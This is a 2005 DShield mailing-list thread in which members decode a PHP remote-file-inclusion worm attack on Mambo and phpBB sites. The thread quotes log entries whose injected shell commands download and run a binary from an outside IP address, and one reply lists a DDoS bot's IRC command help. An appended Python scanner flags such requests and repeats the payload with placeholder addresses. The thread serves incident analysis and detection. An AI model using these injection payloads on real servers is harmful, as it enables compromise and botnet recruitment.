[Dshield] Can Someone Decipher This Log Entry?

DAN MORRILL dan_20407 at msn.com
Thu Dec 22 14:42:20 GMT 2005


Good Morning,

Seeing the same thing off my systems, ISS is calling it:

PHP include worm infects search engine-listed sites 
(HTTP_Spyki_PhpInclude_Worm)
About this signature or vulnerability: This signature detects attacks against 
PHP sites attempted by the PhpInclude.Worm.

:arg 
phpbb_root_path=http://209.136.48.69/cmd.dat?&cmd=cd%20/tmp;wget%20209.136.48.69/cbac;chmod%20744%20cbac;./cbac;echo%20YYY;echo|

:URL	/modules/Forums/admin/admin_styles.phpadmin_styles.php

Hope this helps,
r/d


Sometimes MSN E-mail will indicate that the message failed to be delivered. 
Please resend when you get those; it does not mean that the mail box is bad, 
merely that MSN mail is overworked at the time.



>
>Stephanie -- Excellent Analysis.
>
>Short end of the stick...  I've seen tons of these hit my machine
>lately, and I usually download the code and let it connect just for
>fun..  (oh yeah, then I tell #dshield about it in irc.freenode.net
>and it usually gets shut down post haste)
>
>it's an IRC connector/remote shell client thingy (i know that's
>technical) for botnet usage.  I have about 4 different types on my
>machine in a folder called  "fun".
>
>Joel
>
>
>On Dec 22, 2005, at 5:30 AM, Stephane Grobety wrote:
>
> > Hello David,
> >
> > I've masked part of the IP you provided in your message, just in case.
> > It's a bit silly considering you didn't do the same, but,
> > well, it does no additional harm...
> >
> > It looks like this is an attempt to exploit a flaw in the Mambo
> > content management software (looks like it's this one:
> > http://secunia.com/advisories/14337/).
> >
> > If the exploit succeeds, it will try to wget a file called "micu" from
> > XXX.136.48.69 into the /tmp folder and execute it.
> >
> > At this moment, that server is still serving the file so I checked it.
> > What it does is try to download and execute two more files: "mare"
> > and "ro".
> >
> > "mare" isn't available on the remote server but "ro" is. It looks like
> > an ELF executable. Now, I'm not a specialist in that file format so
> > I may be completely wrong here, but this looks like a Linux x86
> > executable file. It seems to link the /lib/ld-linux.so.2 library and
> > import a bunch of functions that you expect from an IP server program.
> > It also contains a number of strings that indicate that it might try
> > to contact an IRC server (*.undernet.org). It also has a nice internal
> > help that is probably intended to be used by the attacker:
> >
> > NOTICE %s :Current status is: %s.
> > NOTICE %s :Already disabled.
> > NOTICE %s :Password too long! > 254
> > NOTICE %s :Disable sucessful.
> > NOTICE %s :ENABLE <pass>
> > NOTICE %s :Already enabled.
> > NOTICE %s :Wrong password
> > NOTICE %s :Password correct.
> > NOTICE %s :Removed all spoofs
> > NOTICE %s :What kind of subnet address is that? Do something like: 169.40
> > NOTICE %s :Unable to resolve %s
> > NOTICE %s :UDP <target> <port> <secs>
> > NOTICE %s :Packeting %s.
> > NOTICE %s :PAN <target> <port> <secs>
> > NOTICE %s :Panning %s.
> > NOTICE %s :TSUNAMI <target> <secs>
> > NOTICE %s :Tsunami heading for %s.
> > NOTICE %s :UNKNOWN <target> <secs>
> > NOTICE %s :Unknowning %s.
> > NOTICE %s :MOVE <server>
> > NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls
> > NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers
> > NOTICE %s :UDP <target> <port> <secs> = A udp flooder
> > NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder
> > NOTICE %s :NICK <nick> = Changes the nick of the client
> > NOTICE %s :SERVER <server> = Changes servers
> > NOTICE %s :GETSPOOFS = Gets the current spoofing
> > NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet
> > NOTICE %s :DISABLE = Disables all packeting from this client
> > NOTICE %s :ENABLE = Enables all packeting from this client
> > NOTICE %s :KILL = Kills the client
> > NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
> > NOTICE %s :VERSION = Requests version of client
> > NOTICE %s :KILLALL = Kills all current packeting
> > NOTICE %s :HELP = Displays this
> > NOTICE %s :IRC <command> = Sends this command to the server
> > NOTICE %s :SH <command> = Executes a command
> > NOTICE %s :Killing pid %d.
> >
> > So what this looks like is a client for a DDoS botnet.
> >
> > Other entries in the program seem to indicate it's been compiled on a
> > Debian system:
> >
> > /home/drow/debian-glibc/
> >
> > There is also something that looks very much like an HTTP request:
> >
> > GET /%s HTTP/1.0
> > Connection: Keep-Alive
> > User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
> > Host: %s:80
> > Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
> > Accept-Encoding: gzip
> > Accept-Language: en
> > Accept-Charset: iso-8859-1,*,utf-8
> >
> > It would be interesting to see if the request matches your log entry:
> > I think the above request is part of the exploit code.
> >
> > I did a bit of google research and found several DDoS clients that are
> > apparently based on the same code and contain the same string
> > literals.
> >
> > That's all I can say about this... The attacker is still up and
> > running and probably still scanning networks trying to drop its
> > malware.
> >
> > Good luck,
> > Stephane
> >
> >
> > Wednesday, December 21, 2005, 10:53:14 PM, you wrote:
> >
> > DCH> I have about 25 of these today. I've added index2.php to the firewall watcher.
> > DCH> I cannot make sense of this Apache print:
> >
> > DCH> 85.190.1.171 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://XXX.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20XXX.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"
> >
> >
> >
> >
> > --
> > Best regards,
> >  Stephane                            mailto:security at admin.fulgan.com
> >
> > _________________________________________
> > Learn about Intrusion Detection in Depth from the comfort of your
> > own couch:
> > https://www.sans.org/athome/details.php?id=1341&d=1
> >
> > _______________________________________________
> > send all posts to list at lists.dshield.org
> > To change your subscription options (or unsubscribe), see: http://
> > www.dshield.org/mailman/listinfo/list
>
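As an added example (not code from this thread or from any of its posters), the following Python checks Apache access-log lines for the pattern both quoted entries show: a query parameter such as mosConfig_absolute_path or phpbb_root_path set to a remote URL (the include path being overridden), next to a cmd parameter carrying a shell pipeline that fetches and runs a file from /tmp. The log lines inside it are constructed, patterned on the thread's entries but with documentation-range addresses (203.0.113.x, 198.51.100.x) in place of the real ones; the parameter names, command tokens and verdict labels it uses are its own assumptions, not anything from ISS or DShield.

```python
"""Flag PHP remote-file-inclusion (RFI) probes in Apache access-log lines.

Added example for this thread, not code from the list or its posters.
The log lines below are constructed, patterned on the entries quoted in
the thread, with documentation-range addresses in place of real ones.
"""
import re
from urllib.parse import unquote, urlsplit

# Apache combined-log prefix: src ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
# A parameter value that starts a shell pipeline (cd /tmp;wget ...;chmod ...); token list is an assumption.
SHELL_RE = re.compile(r'(?:^|[;|&`])\s*(?:cd|wget|curl|chmod|sh|bash|perl)\s', re.I)
# Host and path of whatever a wget/curl inside the payload would fetch.
FETCH_RE = re.compile(r'\b(?:wget|curl)\s+(?:-\S+\s+)*(?:https?://)?([^\s;|/]+)(/[^\s;|]*)?', re.I)

SAMPLE_LOG = [
    # constructed: mosConfig_absolute_path override, shaped like the quoted Apache line
    r'203.0.113.7 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1'
    r'&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path='
    r'http://198.51.100.10/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.10/micu;chmod%20744%20micu;'
    r'./micu;echo%20YYY;echo| HTTP\x01.1" 200 21 "-" "-"',
    # constructed: ordinary request to the same script, must not be flagged
    '203.0.113.9 - - [21/Dec/2005:16:48:02 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1 HTTP/1.1" 200 8841 "-" "Mozilla/5.0"',
    # constructed: phpbb_root_path override, shaped like the ISS signature in the reply
    '203.0.113.8 - - [22/Dec/2005:09:12:03 -0500] "GET /modules/Forums/admin/admin_styles.php?'
    'phpbb_root_path=http://198.51.100.10/cmd.dat?&cmd=cd%20/tmp;wget%20198.51.100.10/cbac;'
    'chmod%20744%20cbac;./cbac;echo%20YYY;echo| HTTP/1.1" 200 21 "-" "-"',
]


def split_query(query):
    """Split on '&' only and percent-decode. The payload contains ';', so we
    must not treat ';' as a separator the way older urllib.parse.parse_qsl did."""
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote(name), unquote(value)))
    return params


def analyze(line):
    """Return a finding dict for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, has_query, query = m.group("target").partition("?")
    params = split_query(query) if has_query else []
    remote_includes, commands, downloads = [], [], []
    for name, value in params:
        v = value.strip()
        if v.lower().startswith(REMOTE_SCHEMES):          # include path pointed at a remote server
            u = urlsplit(v)
            remote_includes.append({"param": name, "host": u.hostname, "path": u.path})
        if name.lower() == "cmd" or SHELL_RE.search(v):   # shell pipeline smuggled in a parameter
            commands.append(v)
            for host, fpath in FETCH_RE.findall(v):
                downloads.append({"host": host, "file": fpath.rsplit("/", 1)[-1]})
    # GLOBALS= / _REQUEST[...] in the query is the register_globals override seen in the thread.
    globals_override = any(
        n.upper() == "GLOBALS" or n.upper().startswith("_REQUEST[") for n, _ in params
    )
    if remote_includes and commands:
        verdict = "rfi-with-command-execution"
    elif remote_includes:
        verdict = "rfi-probe"
    elif commands:
        verdict = "command-injection-attempt"
    else:
        verdict = None
    return {
        "src": m.group("src"), "time": m.group("time"), "path": path,
        "status": int(m.group("status")), "verdict": verdict,
        "remote_includes": remote_includes, "downloads": downloads,
        "commands": commands, "globals_override": globals_override,
    }


def scan(lines):
    """Findings for every line that earned a verdict; feed it the lines of an access log."""
    return [f for f in map(analyze, lines) if f and f["verdict"]]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        hosts = sorted({d["host"] for d in f["downloads"]} | {r["host"] for r in f["remote_includes"]})
        print(f'{f["src"]} {f["path"]} {f["verdict"]} status={f["status"]} block/hunt: {hosts}')
```

Each finding carries the host named in the include parameter and the host and file name the payload would fetch, which is what to block at the perimeter and what to look for under /tmp on the web server. A 200 status with a small body, as in the thread's entry, only shows the script answered; it does not by itself show that the remote include succeeded, so the verdict is a reason to check the host, not proof of compromise.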



